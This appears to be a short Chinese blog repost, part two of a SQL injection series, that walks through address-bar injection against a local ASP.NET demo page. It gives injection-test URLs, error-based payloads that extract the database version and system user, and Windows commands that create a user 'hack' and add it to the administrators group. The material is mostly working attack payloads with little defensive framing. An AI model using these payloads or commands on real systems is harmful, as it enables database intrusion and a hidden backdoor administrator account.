SQL注入攻击(中)

源文件: d:\code\web-attackDome\web-attackDome\sql-injection\地址栏注入演示\NewsDetails.aspx.cs

Articles

ID
判断是否存在注入:
第一步:'

第二步:http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '1'='1

第三步:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '2'='1
====================================================================================
查版本:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select @@version) and '1'='1

查用户:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select system_user) and '1'='1


net user hack 123456 /add

net localgroup administrators hack /add


原文链接: http://blog.csdn.net/mypc2010/article/details/8209085

你可能感兴趣的:(SQL注入攻击(中))